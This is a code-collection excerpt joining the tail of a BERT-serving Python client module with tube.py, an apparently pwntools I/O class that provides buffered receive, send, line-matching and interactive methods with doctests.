:return: a generator that yields encoded vectors in ndarray, where the request id can be used to determine the order
:rtype: Iterator[tuple(int, numpy.ndarray)]
"""
def run():
cnt = 0
for texts in batch_generator:
self.encode(texts, blocking=False, **kwargs)
cnt += 1
if max_num_batch and cnt == max_num_batch:
break
t = threading.Thread(target=run)
t.start()
return self.fetch(delay)
@staticmethod
def _check_length(texts, len_limit, tokenized):
if tokenized:
            # each element of texts is already a list of tokens
return all(len(t) <= len_limit for t in texts)
else:
# do a simple whitespace tokenizer
return all(len(t.split()) <= len_limit for t in texts)
@staticmethod
def _check_input_lst_str(texts):
if not isinstance(texts, list):
raise TypeError('"%s" must be %s, but received %s' % (texts, type([]), type(texts)))
if not len(texts):
raise ValueError(
'"%s" must be a non-empty list, but received %s with %d elements' % (texts, type(texts), len(texts)))
for idx, s in enumerate(texts):
if not isinstance(s, _str):
raise TypeError('all elements in the list must be %s, but element %d is %s' % (type(''), idx, type(s)))
if not s.strip():
raise ValueError(
'all elements in the list must be non-empty string, but element %d is %s' % (idx, repr(s)))
if _py2:
texts[idx] = _unicode(texts[idx])
@staticmethod
def _check_input_lst_lst_str(texts):
if not isinstance(texts, list):
raise TypeError('"texts" must be %s, but received %s' % (type([]), type(texts)))
if not len(texts):
raise ValueError(
'"texts" must be a non-empty list, but received %s with %d elements' % (type(texts), len(texts)))
for s in texts:
BertClient._check_input_lst_str(s)
@staticmethod
def _print_dict(x, title=None):
if title:
print(title)
for k, v in x.items():
print('%30s\t=\t%-30s' % (k, v))
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
class BCManager():
def __init__(self, available_bc):
self.available_bc = available_bc
self.bc = None
def __enter__(self):
self.bc = self.available_bc.pop()
return self.bc
def __exit__(self, *args):
self.available_bc.append(self.bc)
class ConcurrentBertClient(BertClient):
def __init__(self, max_concurrency=10, **kwargs):
""" A thread-safe client object connected to a BertServer
Create a BertClient that connects to a BertServer.
Note, server must be ready at the moment you are calling this function.
If you are not sure whether the server is ready, then please set `check_version=False` and `check_length=False`
:type max_concurrency: int
:param max_concurrency: the maximum number of concurrent connections allowed
"""
try:
from bert_serving.client import BertClient
except ImportError:
raise ImportError('BertClient module is not available, it is required for serving HTTP requests.'
'Please use "pip install -U bert-serving-client" to install it.'
'If you do not want to use it as an HTTP server, '
'then remove "-http_port" from the command line.')
self.available_bc = [BertClient(**kwargs) for _ in range(max_concurrency)]
self.max_concurrency = max_concurrency
def close(self):
for bc in self.available_bc:
bc.close()
def _concurrent(func):
@wraps(func)
def arg_wrapper(self, *args, **kwargs):
try:
with BCManager(self.available_bc) as bc:
f = getattr(bc, func.__name__)
r = f if isinstance(f, dict) else f(*args, **kwargs)
return r
except IndexError:
raise RuntimeError('Too many concurrent connections!'
'Try to increase the value of "max_concurrency", '
'currently =%d' % self.max_concurrency)
return arg_wrapper
@_concurrent
def encode(self, **kwargs):
pass
@property
@_concurrent
def server_config(self):
pass
@property
@_concurrent
def server_status(self):
pass
@property
@_concurrent
def status(self):
pass
def fetch(self, **kwargs):
raise NotImplementedError('Async encoding of "ConcurrentBertClient" is not implemented yet')
def fetch_all(self, **kwargs):
raise NotImplementedError('Async encoding of "ConcurrentBertClient" is not implemented yet')
def encode_async(self, **kwargs):
raise NotImplementedError('Async encoding of "ConcurrentBertClient" is not implemented yet')
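# --- Illustrative usage sketch (not part of the original module; assumes a
# --- BertServer is already running on localhost with the default ports) ---
#
#   from bert_serving.client import BertClient
#
#   with BertClient() as bc:                      # closed automatically on exit
#       vecs = bc.encode(['First do it', 'then do it right'])
#
#   # Non-blocking usage: queue requests, then collect results in sending order.
#   bc = BertClient()
#   bc.encode(['hello world'], blocking=False)
#   bc.encode(['goodbye world'], blocking=False)
#   results = bc.fetch_all(sort=True)
#   bc.close()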
|
tube.py
|
# -*- coding: utf-8 -*-
import logging
import re
import string
import subprocess
import sys
import threading
import time
from .. import atexit
from .. import term
from ..context import context
from ..log import Logger
from ..timeout import Timeout
from ..util import fiddling
from ..util import misc
from ..util import packing
from .buffer import Buffer
class tube(Timeout, Logger):
"""
    Container of all the tube functions common to sockets, TTYs and SSH connections.
"""
default = Timeout.default
forever = Timeout.forever
#: Delimiter to use for :meth:`sendline`, :meth:`recvline`,
#: and related functions.
newline = '\n'
def __init__(self, timeout = default, level = None):
super(tube, self).__init__(timeout)
Logger.__init__(self, None)
if level is not None:
self.setLevel(level)
self.buffer = Buffer()
atexit.register(self.close)
# Functions based on functions from subclasses
def recv(self, numb = 4096, timeout = default):
r"""recv(numb = 4096, timeout = default) -> str
Receives up to `numb` bytes of data from the tube, and returns
as soon as any quantity of data is available.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Raises:
exceptions.EOFError: The connection is closed
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
>>> t = tube()
>>> # Fake a data source
>>> t.recv_raw = lambda n: 'Hello, world'
>>> t.recv() == 'Hello, world'
True
>>> t.unrecv('Woohoo')
>>> t.recv() == 'Woohoo'
True
>>> with context.local(log_level='debug'):
... _ = t.recv() # doctest: +ELLIPSIS
[...] Received 0xc bytes:
'Hello, world'
"""
return self._recv(numb, timeout) or ''
def unrecv(self, data):
"""unrecv(data)
Puts the specified data back at the beginning of the receive
buffer.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: 'hello'
>>> t.recv()
'hello'
>>> t.recv()
'hello'
>>> t.unrecv('world')
>>> t.recv()
'world'
>>> t.recv()
'hello'
"""
self.buffer.unget(data)
def _fillbuffer(self, timeout = default):
"""_fillbuffer(timeout = default)
Fills the internal buffer from the pipe, by calling
:meth:`recv_raw` exactly once.
Returns:
The bytes of data received, or ``''`` if no data was received.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda *a: 'abc'
>>> len(t.buffer)
0
>>> t._fillbuffer()
'abc'
>>> len(t.buffer)
3
"""
data = ''
with self.local(timeout):
data = self.recv_raw(4096)
if data and self.isEnabledFor(logging.DEBUG):
self.debug('Received %#x bytes:' % len(data))
if all(c in string.printable for c in data):
for line in data.splitlines(True):
self.indented(repr(line), level = logging.DEBUG)
else:
self.indented(fiddling.hexdump(data), level = logging.DEBUG)
if data:
self.buffer.add(data)
return data
def _recv(self, numb = 4096, timeout = default):
"""_recv(numb = 4096, timeout = default) -> str
        Receives one chunk of data from the internal buffer, or from the OS if
        the buffer is empty.
"""
data = ''
# No buffered data, could not put anything in the buffer
# before timeout.
if not self.buffer and not self._fillbuffer(timeout):
return ''
return self.buffer.get(numb)
def recvpred(self, pred, timeout = default):
"""recvpred(pred, timeout = default) -> str
Receives one byte at a time from the tube, until ``pred(bytes)``
evaluates to True.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
pred(callable): Function to call, with the currently-accumulated data.
timeout(int): Timeout for the operation
Raises:
exceptions.EOFError: The connection is closed
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
"""
data = ''
with self.countdown(timeout):
while not pred(data):
try:
res = self.recv(1)
except Exception:
self.unrecv(data)
return ''
if res:
data += res
else:
self.unrecv(data)
return ''
return data
def recvn(self, numb, timeout = default):
"""recvn(numb, timeout = default) -> str
        Receives exactly `numb` bytes.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
.. doctest::
>>> t = tube()
>>> data = 'hello world'
>>> t.recv_raw = lambda *a: data
>>> t.recvn(len(data)) == data
True
>>> t.recvn(len(data)+1) == data + data[0]
True
>>> t.recv_raw = lambda *a: None
>>> # The remaining data is buffered
>>> t.recv() == data[1:]
True
>>> t.recv_raw = lambda *a: time.sleep(0.01) or 'a'
>>> t.recvn(10, timeout=0.05)
''
>>> t.recvn(10, timeout=0.05)
'aaaaaaaaaa'
"""
# Keep track of how much data has been received
# It will be pasted together at the end if a
# timeout does not occur, or put into the tube buffer.
with self.countdown(timeout):
while self.countdown_active() and len(self.buffer) < numb and self._fillbuffer(self.timeout):
pass
if len(self.buffer) < numb:
return ''
return self.buffer.get(numb)
def recvuntil(self, delims, drop=False, timeout = default):
"""recvuntil(delims, timeout = default) -> str
        Receive data until one of `delims` is encountered.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
        Arguments:
            delims(str,tuple): String of delimiter characters, or list of delimiter strings.
drop(bool): Drop the ending. If ``True`` it is removed from the end of the return value.
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello World!"
>>> t.recvuntil(' ')
'Hello '
>>> _=t.clean(0)
>>> # Matches on 'o' in 'Hello'
>>> t.recvuntil(tuple(' Wor'))
'Hello'
>>> _=t.clean(0)
>>> # Matches expressly full string
>>> t.recvuntil(' Wor')
'Hello Wor'
>>> _=t.clean(0)
>>> # Matches on full string, drops match
>>> t.recvuntil(' Wor', drop=True)
'Hello'
>>> # Try with regex special characters
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello|World"
>>> t.recvuntil('|', drop=True)
'Hello'
"""
        # Convert string into singleton tuple
if isinstance(delims, (str, unicode)):
delims = (delims,)
# Longest delimiter for tracking purposes
longest = max(map(len, delims))
# Cumulative data to search
data = []
top = ''
with self.countdown(timeout):
while self.countdown_active():
try:
res = self.recv(timeout=self.timeout)
except Exception:
self.unrecv(''.join(data) + top)
raise
if not res:
self.unrecv(''.join(data) + top)
return ''
top += res
start = len(top)
for d in delims:
j = top.find(d)
if start > j > -1:
start = j
end = j + len(d)
if start < len(top):
self.unrecv(top[end:])
if drop:
top = top[:start]
else:
top = top[:end]
return ''.join(data) + top
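                # No delimiter found yet: only a short tail of ``top`` (roughly the
                # length of the longest delimiter) can still contain the start of a
                # match, so move the rest into ``data`` to keep the search cheap.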
if len(top) > longest:
i = -longest - 1
data.append(top[:i])
top = top[i:]
return ''
def recvlines(self, numlines=2**20, keepends = False, timeout = default):
r"""recvlines(numlines, keepends = False, timeout = default) -> str list
        Receive up to ``numlines`` lines.
A "line" is any sequence of bytes terminated by the byte sequence
set by :attr:`newline`, which defaults to ``'\n'``.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
numlines(int): Maximum number of lines to receive
keepends(bool): Keep newlines at the end of each line (``False``).
timeout(int): Maximum timeout
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
            A list of the lines received before the timeout, with trailing
            newlines removed unless ``keepends`` is ``True``.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: '\n'
>>> t.recvlines(3)
['', '', '']
>>> t.recv_raw = lambda n: 'Foo\nBar\nBaz\n'
>>> t.recvlines(3)
['Foo', 'Bar', 'Baz']
>>> t.recvlines(3, True)
['Foo\n', 'Bar\n', 'Baz\n']
"""
lines = []
with self.countdown(timeout):
for _ in xrange(numlines):
try:
# We must set 'keepends' to True here so that we can
# restore the original, unmodified data to the buffer
# in the event of a timeout.
res = self.recvline(keepends=True, timeout=timeout)
except Exception:
self.unrecv(''.join(lines))
raise
if res:
lines.append(res)
else:
break
if not keepends:
lines = [line.rstrip(self.newline) for line in lines]
return lines
def recvline(self, keepends = True, timeout = default):
r"""recvline(keepends = True) -> str
Receive a single line from the tube.
A "line" is any sequence of bytes terminated by the byte sequence
set in :attr:`newline`, which defaults to ``'\n'``.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
keepends(bool): Keep the line ending (``True``).
timeout(int): Timeout
Return:
All bytes received over the tube until the first
newline ``'\n'`` is received. Optionally retains
the ending.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: 'Foo\nBar\r\nBaz\n'
>>> t.recvline()
'Foo\n'
>>> t.recvline()
'Bar\r\n'
>>> t.recvline(keepends = False)
'Baz'
>>> t.newline = '\r\n'
>>> t.recvline(keepends = False)
'Foo\nBar'
"""
return self.recvuntil(self.newline, drop = not keepends, timeout = timeout)
def recvline_pred(self, pred, keepends = False, timeout = default):
r"""recvline_pred(pred, keepends = False) -> str
Receive data until ``pred(line)`` returns a truthy value.
Drop all other data.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
pred(callable): Function to call. Returns the line for which
this function returns ``True``.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: "Foo\nBar\nBaz\n"
>>> t.recvline_pred(lambda line: line == "Bar\n")
'Bar'
>>> t.recvline_pred(lambda line: line == "Bar\n", keepends=True)
'Bar\n'
>>> t.recvline_pred(lambda line: line == 'Nope!', timeout=0.1)
''
"""
tmpbuf = Buffer()
line = ''
with self.countdown(timeout):
while self.countdown_active():
try:
line = self.recvline(keepends=True)
except Exception:
self.buffer.add(tmpbuf)
raise
if not line:
self.buffer.add(tmpbuf)
return ''
if pred(line):
if not keepends:
line = line[:-len(self.newline)]
return line
else:
tmpbuf.add(line)
return ''
def recvline_contains(self, items, keepends = False, timeout = default):
r"""
Receive lines until one line is found which contains at least
one of `items`.
Arguments:
items(str,tuple): List of strings to search for, or a single string.
keepends(bool): Return lines with newlines if ``True``
timeout(int): Timeout, in seconds
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello\nWorld\nXylophone\n"
>>> t.recvline_contains('r')
'World'
>>> f = lambda n: "cat dog bird\napple pear orange\nbicycle car train\n"
>>> t = tube()
>>> t.recv_raw = f
>>> t.recvline_contains('pear')
'apple pear orange'
>>> t = tube()
>>> t.recv_raw = f
>>> t.recvline_contains(('car', 'train'))
'bicycle car train'
"""
if isinstance(items, (str,unicode)):
items = (items,)
def pred(line):
return any(d in line for d in items)
return self.recvline_pred(pred, keepends, timeout)
def recvline_startswith(self, delims, keepends = False, timeout = default):
r"""recvline_startswith(delims, keepends = False, timeout = default) -> str
        Keep receiving lines until one is found that starts with one of
        `delims`. Returns the first such line.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
delims(str,tuple): List of strings to search for, or string of single characters
keepends(bool): Return lines with newlines if ``True``
timeout(int): Timeout, in seconds
Returns:
The first line received which starts with a delimiter in ``delims``.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello\nWorld\nXylophone\n"
>>> t.recvline_startswith(tuple('WXYZ'))
'World'
>>> t.recvline_startswith(tuple('WXYZ'), True)
'Xylophone\n'
>>> t.recvline_startswith('Wo')
'World'
"""
        # Convert string into singleton tuple
if isinstance(delims, (str, unicode)):
delims = (delims,)
return self.recvline_pred(lambda line: any(map(line.startswith, delims)),
keepends=keepends,
timeout=timeout)
def recvline_endswith(self, delims, keepends = False, timeout = default):
r"""recvline_endswith(delims, keepends = False, timeout = default) -> str
        Keep receiving lines until one is found that ends with one of
        `delims`. Returns the first such line.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
See :meth:`recvline_startswith` for more details.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: 'Foo\nBar\nBaz\nKaboodle\n'
>>> t.recvline_endswith('r')
'Bar'
>>> t.recvline_endswith(tuple('abcde'), True)
'Kaboodle\n'
>>> t.recvline_endswith('oodle')
'Kaboodle'
"""
        # Convert string into singleton tuple
if isinstance(delims, (str, unicode)):
delims = (delims,)
delims = tuple(delim + self.newline for delim in delims)
return self.recvline_pred(lambda line: any(map(line.endswith, delims)),
keepends=keepends,
timeout=timeout)
def recvregex(self, regex, exact = False, timeout = default):
"""recvregex(regex, exact = False, timeout = default) -> str
Wrapper around :func:`recvpred`, which will return when a regex
matches the string in the buffer.
By default :func:`re.RegexObject.search` is used, but if `exact` is
set to True, then :func:`re.RegexObject.match` will be used instead.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
"""
if isinstance(regex, (str, unicode)):
regex = re.compile(regex)
if exact:
pred = regex.match
else:
pred = regex.search
return self.recvpred(pred, timeout = timeout)
def recvline_regex(self, regex, exact = False, keepends = False, timeout = default):
"""recvregex(regex, exact = False, keepends = False, timeout = default) -> str
Wrapper around :func:`recvline_pred`, which will return when a regex
matches a line.
By default :func:`re.RegexObject.search` is used, but if `exact` is
set to True, then :func:`re.RegexObject.match` will be used instead.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
"""
if isinstance(regex, (str, unicode)):
regex = re.compile(regex)
if exact:
pred = regex.match
else:
pred = regex.search
return self.recvline_pred(pred, keepends = keepends, timeout = timeout)
def recvrepeat(self, timeout = default):
"""recvrepeat()
Receives data until a timeout or EOF is reached.
Examples:
>>> data = [
... 'd',
... '', # simulate timeout
... 'c',
... 'b',
... 'a',
... ]
>>> def delayrecv(n, data=data):
... return data.pop()
>>> t = tube()
>>> t.recv_raw = delayrecv
>>> t.recvrepeat(0.2)
'abc'
>>> t.recv()
'd'
"""
try:
while self._fillbuffer(timeout=timeout):
pass
except EOFError:
pass
return self.buffer.get()
def recvall(self, timeout=Timeout.forever):
"""recvall() -> str
Receives data until EOF is reached.
"""
        with self.waitfor('Receiving all data') as h:
l = len(self.buffer)
with self.local(timeout):
try:
while True:
l = misc.size(len(self.buffer))
h.status(l)
if not self._fillbuffer():
break
except EOFError:
pass
h.success("Done (%s)" % l)
self.close()
return self.buffer.get()
def send(self, data):
"""send(data)
Sends data.
If log level ``DEBUG`` is enabled, also prints out the data
received.
If it is not possible to send anymore because of a closed
connection, it raises ``exceptions.EOFError``
Examples:
>>> def p(x): print repr(x)
>>> t = tube()
>>> t.send_raw = p
>>> t.send('hello')
'hello'
"""
if self.isEnabledFor(logging.DEBUG):
self.debug('Sent %#x bytes:' % len(data))
if all(c in string.printable for c in data):
for line in data.splitlines(True):
self.indented(repr(line), level = logging.DEBUG)
else:
self.indented(fiddling.hexdump(data), level = logging.DEBUG)
self.send_raw(data)
def sendline(self, line=''):
r"""sendline(data)
Shorthand for ``t.send(data + t.newline)``.
Examples:
>>> def p(x): print repr(x)
>>> t = tube()
>>> t.send_raw = p
>>> t.sendline('hello')
'hello\n'
>>> t.newline = '\r\n'
>>> t.sendline('hello')
'hello\r\n'
"""
self.send(line + self.newline)
def sendafter(self, delim, data, timeout = default):
"""sendafter(delim, data, timeout = default) -> str
A combination of ``recvuntil(delim, timeout)`` and ``send(data)``.
"""
res = self.recvuntil(delim, timeout)
self.send(data)
return res
def sendlineafter(self, delim, data, timeout = default):
"""sendlineafter(delim, data, timeout = default) -> str
A combination of ``recvuntil(delim, timeout)`` and ``sendline(data)``."""
res = self.recvuntil(delim, timeout)
self.sendline(data)
return res
def sendthen(self, delim, data, timeout = default):
"""sendthen(delim, data, timeout = default) -> str
A combination of ``send(data)`` and ``recvuntil(delim, timeout)``."""
self.send(data)
return self.recvuntil(delim, timeout)
def sendlinethen(self, delim, data, timeout = default):
"""sendlinethen(delim, data, timeout = default) -> str
A combination of ``sendline(data)`` and ``recvuntil(delim, timeout)``."""
self.send(data + self.newline)
return self.recvuntil(delim, timeout)
def interactive(self, prompt = term.text.bold_red('$') + ' '):
"""interactive(prompt = pwnlib.term.text.bold_red('$') + ' ')
Does simultaneous reading and writing to the tube. In principle this just
connects the tube to standard in and standard out, but in practice this
is much more usable, since we are using :mod:`pwnlib.term` to print a
floating prompt.
        Thus it only works while in :data:`pwnlib.term.term_mode`.
"""
self.info('Switching to interactive mode')
go = threading.Event()
def recv_thread():
while not go.isSet():
try:
cur = self.recv(timeout = 0.05)
if cur:
sys.stderr.write(cur)
sys.stderr.flush()
except EOFError:
self.info('Got EOF while reading in interactive')
break
t = context.Thread(target = recv_thread)
t.daemon = True
t.start()
try:
while not go.isSet():
if term.term_mode:
data = term.readline.readline(prompt = prompt, float = True)
else:
data = sys.stdin.read(1)
if data:
try:
self.send(data)
except EOFError:
go.set()
self.info('Got EOF while sending in interactive')
else:
go.set()
except KeyboardInterrupt:
self.info('Interrupted')
go.set()
while t.is_alive():
t.join(timeout = 0.1)
def clean(self, timeout = 0.05):
"""clean(timeout = 0.05)
Removes all the buffered data from a tube by calling
:meth:`pwnlib.tubes.tube.tube.recv` with a low timeout until it fails.
        If ``timeout`` is zero, the underlying network is not actually polled;
        only the internal (cached) buffer is cleared.
Returns:
All data received
Examples:
>>> t = tube()
>>> t.unrecv('clean me up')
>>> t.clean(0)
'clean me up'
>>> len(t.buffer)
0
"""
if timeout == 0:
return self.buffer.get()
return self.recvrepeat(timeout)
def clean_and_log(self, timeout = 0.05):
r"""clean_and_log(timeout = 0.05)
        Works exactly as :meth:`pwnlib.tubes.tube.tube.clean`, but logs received
data with :meth:`pwnlib.self.info`.
Returns:
All data received
Examples:
>>> def recv(n, data=['', 'hooray_data']):
... while data: return data.pop()
>>> t = tube()
>>> t.recv_raw = recv
>>> t.connected_raw = lambda d: True
>>> t.fileno = lambda: 1234
>>> with context.local(log_level='info'):
... data = t.clean_and_log() #doctest: +ELLIPSIS
[DEBUG] Received 0xb bytes:
'hooray_data'
>>> data
'hooray_data'
>>> context.clear()
"""
with context.local(log_level='debug'):
return self.clean(timeout)
def connect_input(self, other):
"""connect_input(other)
Connects the input of this tube to the output of another tube object.
Examples:
>>> def p(x): print x
>>> def recvone(n, data=['data']):
... while data: return data.pop()
... raise EOFError
>>> a = tube()
>>> b = tube()
>>> a.recv_raw = recvone
>>> b.send_raw = p
>>> a.connected_raw = lambda d: True
>>> b.connected_raw = lambda d: True
>>> a.shutdown = lambda d: True
>>> b.shutdown = lambda d: True
>>> import time
>>> _=(b.connect_input(a), time.sleep(0.1))
data
"""
def pump():
import sys as _sys
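            # ``sys`` is captured under a local name because pump() runs in a
            # daemon thread: at interpreter shutdown module globals may already
            # be torn down, and the ``if not _sys`` checks below bail out quietly.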
while self.countdown_active():
if not (self.connected('send') and other.connected('recv')):
break
try:
data = other.recv(timeout = 0.05)
except EOFError:
break
if not _sys:
return
if not data:
continue
try:
self.send(data)
except EOFError:
break
if not _sys:
return
self.shutdown('send')
other.shutdown('recv')
t = context.Thread(target = pump)
t.daemon = True
t.start()
def connect_output(self, other):
"""connect_output(other)
Connects the output of this tube to the input of another tube object.
Examples:
>>> def p(x): print x
>>> def recvone(n, data=['data']):
... while data: return data.pop()
... raise EOFError
>>> a = tube()
>>> b = tube()
>>> a.recv_raw = recvone
>>> b.send_raw = p
>>> a.connected_raw = lambda d: True
>>> b.connected_raw = lambda d: True
>>> a.shutdown = lambda d: True
>>> b.shutdown = lambda d: True
>>> _=(a.connect_output(b), time.sleep(0.1))
data
"""
other.connect_input(self)
def connect_both(self, other):
"""connect_both(other)
Connects the both ends of this tube object with another tube object."""
self.connect_input(other)
self.connect_output(other)
def spawn_process(self, *args, **kwargs):
"""Spawns a new process having this tube as stdin, stdout and stderr.
Takes the same arguments as :class:`subprocess.Popen`."""
return subprocess.Popen(
*args,
stdin = self.fileno(),
stdout = self.fileno(),
stderr = self.fileno(),
**kwargs
)
def __lshift__(self, other):
"""
Shorthand for connecting multiple tubes.
See :meth:`connect_input` for more information.
Examples:
The following are equivalent ::
                tube_a << tube_b
tube_a.connect_input(tube_b)
This is useful when chaining multiple tubes ::
                tube_a << tube_b << tube_a
tube_a.connect_input(tube_b)
tube_b.connect_input(tube_a)
"""
self.connect_input(other)
return other
def __rshift__(self, other):
"""
Inverse of the ``<<`` operator. See :meth:`__lshift__`.
See :meth:`connect_input` for more information.
"""
self.connect_output(other)
return other
def __ne__(self, other):
"""
        Shorthand for connecting tubes to each other.
The following are equivalent ::
a >> b >> a
a <> b
See :meth:`connect_input` for more information.
"""
self << other << self
def wait_for_close(self):
"""Waits until the tube is closed."""
while self.connected():
time.sleep(0.05)
def can_recv(self, timeout = 0):
"""can_recv(timeout = 0) -> bool
Returns True, if there is data available within `timeout` seconds.
Examples:
>>> import time
>>> t = tube()
>>> t.can_recv_raw = lambda *a: False
>>> t.can_recv()
False
>>> _=t.unrecv('data')
>>> t.can_recv()
True
>>> _=t.recv()
>>> t.can_recv()
False
"""
return bool(self.buffer or self.can_recv_raw(timeout))
def settimeout(self, timeout):
"""settimeout(timeout)
Set the timeout for receiving operations. If the string "default"
is given, then :data:`context.timeout` will be used. If None is given,
then there will be no timeout.
Examples:
>>> t = tube()
>>> t.settimeout_raw = lambda t: None
>>> t.settimeout(3)
>>> t.timeout == 3
True
"""
self.timeout = timeout
shutdown_directions = {
'in': 'recv',
'read': 'recv',
'recv': 'recv',
'out': 'send',
'write': 'send',
'send': 'send',
}
connected_directions = shutdown_directions.copy()
connected_directions['any'] = 'any'
def shutdown(self, direction = "send"):
"""shutdown(direction = "send")
Closes the tube for further reading or writing depending on `direction`.
Arguments:
direction(str): Which direction to close; "in", "read" or "recv"
closes the tube in the ingoing direction, "out", "write" or "send"
closes it in the outgoing direction.
Returns:
:const:`None`
Examples:
>>> def p(x): print x
>>> t = tube()
>>> t.shutdown_raw = p
>>> _=map(t.shutdown, ('in', 'read', 'recv', 'out', 'write', 'send'))
recv
recv
recv
send
send
send
>>> t.shutdown('bad_value') #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: "direction must be in ['in', 'out', 'read', 'recv', 'send', 'write']"
"""
try:
direction = self.shutdown_directions[direction]
except KeyError:
raise KeyError('direction must be in %r' % sorted(self.shutdown_directions))
else:
self.shutdown_raw(self.shutdown_directions[direction])
def connected(self, direction = 'any'):
"""connected(direction = 'any') -> bool
Returns True if the tube is connected in the specified direction.
Arguments:
direction(str): Can be the string 'any', 'in', 'read', 'recv',
'out', 'write', 'send'.
Doctest:
>>> def p(x): print x
>>> t = tube()
>>> t.connected_raw = p
>>> _=map(t.connected, ('any', 'in', 'read', 'recv', 'out', 'write', 'send'))
any
recv
recv
recv
send
send
send
>>> t.connected('bad_value') #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: "direction must be in ['any', 'in', 'out', 'read', 'recv', 'send', 'write']"
"""
try:
direction = self.connected_directions[direction]
except KeyError:
raise KeyError('direction must be in %r' % sorted(self.connected_directions))
else:
return self.connected_raw(direction)
def __enter__(self):
"""Permit use of 'with' to control scoping and closing sessions.
Examples:
.. doctest::
>>> t = tube()
>>> def p(x): print x
>>> t.close = lambda: p("Closed!")
>>> with t: pass
Closed!
"""
return self
def __exit__(self, type, value, traceback):
"""Handles closing for 'with' statement
See :meth:`__enter__`
"""
self.close()
# The minimal interface to be implemented by a child
def recv_raw(self, numb):
"""recv_raw(numb) -> str
Should not be called directly. Receives data without using the buffer
on the object.
Unless there is a timeout or closed connection, this should always
return data. In case of a timeout, it should return None, in case
of a closed connection it should raise an ``exceptions.EOFError``.
"""
raise EOFError('Not implemented')
def send_raw(self, data):
"""send_raw(data)
Should not be called directly. Sends data to the tube.
Should raise ``exceptions.EOFError`` if it is unable to send any
more, because of a closed tube.
"""
raise EOFError('Not implemented')
def settimeout_raw(self, timeout):
"""settimeout_raw(timeout)
Should not be called directly. Sets the timeout for
the tube.
"""
raise NotImplementedError()
def timeout_change(self):
"""
Informs the raw layer of the tube that the timeout has changed.
Should not be called directly.
Inherited from :class:`Timeout`.
"""
try:
self.settimeout_raw(self.timeout)
except NotImplementedError:
pass
def can_recv_raw(self, timeout):
"""can_recv_raw(timeout) -> bool
Should not be called directly. Returns True, if
there is data available within the timeout, but
ignores the buffer on the object.
"""
raise NotImplementedError()
def connected_raw(self, direction):
"""connected(direction = 'any') -> bool
Should not be called directly. Returns True iff the
tube is connected in the given direction.
"""
raise NotImplementedError()
def close(self):
"""close()
Closes the tube.
"""
pass
# Ideally we could:
# raise NotImplementedError()
# But this causes issues with the unit tests.
def fileno(self):
"""fileno() -> int
Returns the file number used for reading.
"""
raise NotImplementedError()
def shutdown_raw(self, direction):
"""shutdown_raw(direction)
Should not be called directly. Closes the tube for further reading or
writing.
"""
raise NotImplementedError()
#: Alias for :meth:`recv`
def read(self, *a, **kw): return self.recv(*a, **kw)
#: Alias for :meth:`recvpred`
def readpred(self, *a, **kw): return self.recvpred(*a, **kw)
#: Alias for :meth:`recvn`
def readn(self, *a, **kw): return self.recvn(*a, **kw)
#: Alias for :meth:`recvuntil`
def readuntil(self, *a, **kw): return self.recvuntil(*a, **kw)
#: Alias for :meth:`recvlines`
def readlines(self, *a, **kw): return self.recvlines(*a, **kw)
#: Alias for :meth:`recvline`
def readline(self, *a, **kw): return self.recvline(*a, **kw)
#: Alias for :meth:`recvline_pred`
def readline_pred(self, *a, **kw): return self.recvline_pred(*a, **kw)
#: Alias for :meth:`recvline_contains`
def readline_contains(self, *a, **kw): return self.recvline_contains(*a, **kw)
#: Alias for :meth:`recvline_startswith`
def readline_startswith(self, *a, **kw): return self.recvline_startswith(*a, **kw)
#: Alias for :meth:`recvline_endswith`
def readline_endswith(self, *a, **kw): return self.recvline_endswith(*a, **kw)
#: Alias for :meth:`recvregex`
def readregex(self, *a, **kw): return self.recvregex(*a, **kw)
#: Alias for :meth:`recvline_regex`
def readline_regex(self, *a, **kw): return self.recvline_regex(*a, **kw)
#: Alias for :meth:`recvrepeat`
def readrepeat(self, *a, **kw): return self.recvrepeat(*a, **kw)
#: Alias for :meth:`recvall`
def readall(self, *a, **kw): return self.recvall(*a, **kw)
#: Alias for :meth:`send`
def write(self, *a, **kw): return self.send(*a, **kw)
#: Alias for :meth:`sendline`
def writeline(self, *a, **kw): return self.sendline(*a, **kw)
#: Alias for :meth:`sendafter`
def writeafter(self, *a, **kw): return self.sendafter(*a, **kw)
#: Alias for :meth:`sendlineafter`
